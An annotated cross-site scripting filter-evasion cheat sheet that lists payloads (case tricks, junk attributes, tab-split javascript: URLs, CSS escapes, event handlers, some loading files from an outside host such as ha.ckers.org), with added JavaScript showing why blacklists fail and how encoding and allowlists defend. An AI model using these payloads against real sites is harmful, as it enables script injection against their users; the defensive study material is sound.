1. Change the letter case

HTML tag names are case-insensitive, so a filter that only matches the lowercase string "<script>" is bypassed:

<sCript>alert('d')</scRipT>
2. Add extra characters to evade the regular expression check

A regex written against the "normal" shape of a tag does not match these, but the browser's tokenizer still sees a script tag with a src attribute. The doubled "<" leaves a stray text character in front of a real tag, and a ">" placed inside a quoted junk attribute value stops a pattern such as <script[^>]*> short of the real end of the tag:

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
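The following is an added example, not code from the original post. It grades a naive blacklist filter against the case and extra-character tricks of items 1 and 2 (plus the "/" trick from item 5), beside the fix that actually works for text placed between tags: encoding the characters the HTML tokenizer cares about. The payload strings are constructed from the page; the filter functions and the grading oracle are this example's own.

```javascript
// Added example, not code from the original post: a naive blacklist filter
// against the case and extra-character tricks of items 1 and 2, beside the
// correct fix (output encoding). Payload strings are constructed from the page.

// Typical naive filter: strip the exact lowercase tag.
function naiveFilter(input) {
  return input.replace(/<script>/g, '');
}

// Slightly better: case-insensitive, but still anchored on the exact tag text.
function caseInsensitiveFilter(input) {
  return input.replace(/<script>/gi, '');
}

// The real fix for untrusted text placed between tags: encode every character
// that has meaning to the HTML tokenizer, so no tag can exist in the output.
function htmlEncode(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;' };
  return input.replace(/[&<>"'`]/g, (c) => map[c]);
}

// Oracle used only to grade the filters: does an opening <script ...> tag
// survive, in any case, followed by whitespace, "/" or ">"? That is the shape
// the tokenizer accepts, and what a regex on the raw string misses.
const SCRIPT_OPEN = /<script[\s/>]/i;
function stillHasScriptTag(s) {
  return SCRIPT_OPEN.test(s);
}

const payloads = [
  "<sCript>alert('d')</scRipT>",            // item 1: mixed case
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',     // item 2: ">" hidden in an attribute value
  '<SCRIPT a=`>` SRC="t.js"></SCRIPT>',     // item 2: backtick-quoted junk attribute
  '<SCRIPT/SRC="t.js"></SCRIPT>',           // item 5: "/" instead of a space
];

// Returns one boolean per payload: true means a script tag survived the filter.
function grade(filter) {
  return payloads.map((p) => stillHasScriptTag(filter(p)));
}

// grade(naiveFilter)            -> [true, true, true, true]
// grade(caseInsensitiveFilter)  -> [false, true, true, true]
// grade(htmlEncode)             -> [false, false, false, false]
```

The two blacklist filters fail in different places but both fail; the encoder passes every case because it never tries to recognise a tag at all. The oracle regex is for grading only and is not itself a defence.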
3. Use another extension instead of .js

The browser ignores the file extension: whatever the server returns for the src URL is executed as script, so checking that src ends in ".js" proves nothing.

<script src="bad.jpg"></script>
4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example (contents of xss.css):

body {
    background-image: url('javascript:alert("XSS");')
}

Only older browsers such as Internet Explorer executed a "javascript:" URL referenced from a stylesheet.
5. Put other characters inside the script tag

The HTML tokenizer accepts "/" as a separator between the tag name and its attributes, so a regex that expects a space after "script" misses these:

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or newline to evade

Browsers remove ASCII tab, line feed and carriage return characters from a URL before parsing it, so "jav<TAB>ascript:" is still the javascript: scheme to the browser while a literal string match for "javascript:" fails. The control characters were flattened to spaces in this copy:

<img src="jav ascr ipt:alert('XSS3')">   -> the gaps are tab characters

<img src="jav ascr ipt:alert('XSS3')">   -> the gaps are newline characters

<IMG SRC="jav ascript:alert('XSS');">    -> same trick with a single gap
7. Use "\" to evade

In CSS a backslash escapes the character after it ("expre\ssion" is read as "expression") and comments are discarded, so a filter looking for the literal keyword never sees it. Note that expression() is an Internet Explorer feature and does not exist in other browsers.

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

CSS also accepts a character written as a hex escape ("\65" is "e"), and the body of a javascript: URL is percent-decoded before it runs, so the same payloads can be written with no recognizable keyword in the raw text. The hex-encoded forms did not survive in this copy; only the decoded source of each remains:

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
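The following is an added example, not code from the original post. It shows what a CSS tokenizer makes of the backslash, comment and hex-escape payloads of items 7 and 8, and why a keyword check on the raw string is blind to them. The item-7 samples are taken from the page; the hex-escaped sample is constructed here because the page's own encoded payloads did not survive copying. The detector regex and the normalisation routine are this example's own and deliberately approximate IE's lenient parser rather than a conforming one.

```javascript
// Added example, not code from the original post: what a browser's CSS
// tokenizer makes of the backslash, comment and hex-escape payloads of items
// 7 and 8, and why a check on the raw string is blind to them. The hex-encoded
// sample is constructed here because the page's own did not survive copying.

// Remove /* ... */ comments outside of quoted strings (a comment marker inside
// a string, like the "*//*" in the last item-7 payload, is not a comment).
function stripCssComments(css) {
  let out = '';
  let quote = null;
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (quote) {
      out += c;
      if (c === '\\' && i + 1 < css.length) out += css[++i];   // keep the escaped char
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'") {
      quote = c;
      out += c;
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 1;                   // skip the comment
    } else {
      out += c;
    }
  }
  return out;
}

// Decode CSS escapes: "\" + 1..6 hex digits (+ optional single whitespace)
// is a code point; "\" + any other character is that character.
function decodeCssEscapes(css) {
  return css.replace(/\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f0-9a-fA-F]))/g, (m, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
  });
}

function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(css));
}

// Conservative detector for the two dangerous constructs the page uses. It is
// looser than a real tokenizer on purpose (IE accepted "expr/**/ession" as one
// identifier; a conforming parser would not), because over-matching is the
// safe direction for a check like this.
const DANGEROUS = /expression\s*\(|javascript\s*:/i;

function rawCheck(css)        { return DANGEROUS.test(css); }
function normalizedCheck(css) { return DANGEROUS.test(normalizeCss(css)); }

const samples = [
  '@im\\port\'\\ja\\vasc\\ript:alert("XSS32")\';',                   // item 7
  'xss:expre\\ssion(alert("XSS33"))',                                // item 7
  "xss:expr/*anyword*/ession(alert('sss'))",                         // item 7
  "width: expre\\ssi\\on(alert('XSS31'));",                          // item 7
  'no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))', // item 7
  'width: \\65\\78\\70\\72\\65\\73\\73\\69\\6f\\6e(alert(1))',        // item 8, constructed hex escapes
  "width: 100px; background: url('/img/a.png')",                     // benign
];

function gradeRaw()        { return samples.map(rawCheck); }
function gradeNormalized() { return samples.map(normalizedCheck); }

// gradeRaw()        -> [false, false, false, false, false, false, false]
// gradeNormalized() -> [true, true, true, true, true, true, false]
```

The raw check misses every payload; after normalisation all six are caught and the benign rule still passes. Even so, a detector like this belongs in tests and telemetry: the robust policy for user-supplied style is an allowlist of properties and values, or no user CSS at all.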
9. Script in an HTML tag (event handler attributes)

Every on* attribute takes script as its value, so blocking "<script" alone achieves nothing:

<body onload="alert('onload')">

Event handler attributes:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside a swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

With AllowScriptAccess="always" the Flash movie may call JavaScript in the embedding page, so embedding an attacker-controlled .swf is equivalent to including a script.
11. Use CDATA to split the XSS code and reassemble it

The string "javascript:" is split across two CDATA sections (or around an HTML comment) inside an XML data island; when the SPAN binds the field as HTML the pieces are joined again. XML data islands and DATASRC/DATAFLD binding exist only in Internet Explorer.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

HTML+TIME (an Internet Explorer behavior) lets a t:set element assign innerHTML, and the assigned markup is parsed and run. DEFER is what makes IE execute a script inserted through innerHTML:

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

This executes nothing by itself: it plants a cookie value containing script, which fires later wherever the application echoes the cookie into a page without encoding it.
14. javascript: in src, href and url()

Any attribute or CSS property that takes a URL is a candidate, not just <a href>. Current browsers only run "javascript:" URLs in navigation contexts (IFRAME/FRAME SRC, A HREF, form actions, location); the IMG, LINK, TABLE BACKGROUND and CSS url() variants, as well as DYNSRC and LOWSRC, only worked in older browsers (Internet Explorer, Netscape).

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
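The following is an added example, not code from the original post. It is one attribute-level policy that covers items 6, 9 and 14 together: event handler attributes are dropped by name, unknown attributes (DYNSRC, LOWSRC, BACKGROUND, STYLE) are dropped because they are not on an allowlist, and URL-valued attributes are checked against a scheme allowlist after the same tab/newline normalisation a browser applies. It takes an already-parsed element (tag name plus attribute map) so that no HTML parser has to be written here; in practice it should be fed from a real parser, never from a regex over raw HTML. The tag and attribute allowlists, the sample inputs and all function names are this example's own assumptions.

```javascript
// Added example, not code from the original post: one attribute-level policy
// that covers items 6, 9 and 14 together. It takes an already-parsed element
// (tag name plus attribute map) so that no HTML parser has to be written here;
// in practice feed it from a real parser, never from a regex over raw HTML.
// The tag and attribute allowlists below are assumptions chosen for the example.

const ALLOWED_ATTRS = {
  a:   new Set(['href', 'title']),
  img: new Set(['src', 'alt', 'width', 'height']),
  p:   new Set(),
  b:   new Set(),
};
const URL_ATTRS = new Set(['href', 'src']);
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Browsers delete ASCII tab, LF and CR anywhere in a URL and trim leading and
// trailing C0 controls and spaces before they read the scheme; the check has
// to do the same, or "jav<TAB>ascript:" (item 6) slips through.
function normalizeUrl(raw) {
  return raw.replace(/[\t\n\r]/g, '').replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

// The naive check the item-6 payloads are built against.
function naiveIsJavascriptUrl(raw) {
  return raw.toLowerCase().startsWith('javascript:');
}

// Scheme allowlist: a relative URL (no scheme) or an allowed scheme passes;
// javascript:, data:, vbscript: and anything unexpected are rejected.
function isSafeUrl(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalizeUrl(raw));
  if (!m) return true;
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Returns { tag, attrs } with only the allowed attributes, or null when the
// tag itself is not allowed. `dropped` receives a reason for each removal so
// the caller can log attempts.
function sanitizeElement(tag, attrs, dropped = []) {
  const name = tag.toLowerCase();
  const allowed = ALLOWED_ATTRS[name];
  if (!allowed) { dropped.push(`tag ${name}`); return null; }
  const out = {};
  for (const [rawKey, value] of Object.entries(attrs)) {
    const key = rawKey.toLowerCase();
    if (key.startsWith('on')) { dropped.push(`${key}: event handler`); continue; }   // item 9
    if (!allowed.has(key))    { dropped.push(`${key}: not in allowlist`); continue; } // DYNSRC, LOWSRC, STYLE, ...
    if (URL_ATTRS.has(key) && !isSafeUrl(value)) {                                    // items 6 and 14
      dropped.push(`${key}: scheme not allowed`);
      continue;
    }
    out[key] = value;
  }
  return { tag: name, attrs: out };
}

// Constructed inputs taken from the payloads above.
const samples = [
  ['BODY',   { onload: "alert('onload')" }],                          // item 9
  ['IMG',    { SRC: "jav\tascr\tipt:alert('XSS3')", alt: 'x' }],      // item 6
  ['IMG',    { DYNSRC: "javascript:alert('XSS20')", src: '/a.png' }], // item 14
  ['IFRAME', { SRC: "javascript:alert('13')" }],                      // item 14
  ['A',      { HREF: 'JaVaScRiPt:alert(1)', onclick: 'x()', title: 't' }],
  ['a',      { href: 'https://example.com/' }],                       // benign
];

// One record per sample: which attributes survived and why the rest were dropped.
function runSamples() {
  return samples.map(([tag, attrs]) => {
    const dropped = [];
    const el = sanitizeElement(tag, attrs, dropped);
    return { tag, kept: el ? Object.keys(el.attrs) : null, dropped };
  });
}
```

The point of the allowlist is that DYNSRC and LOWSRC never have to be known about: anything not explicitly permitted is gone, and the scheme check only runs on the few attributes that are permitted to carry a URL. Contrast naiveIsJavascriptUrl, which returns false for the tab-separated item-6 payload that isSafeUrl correctly rejects.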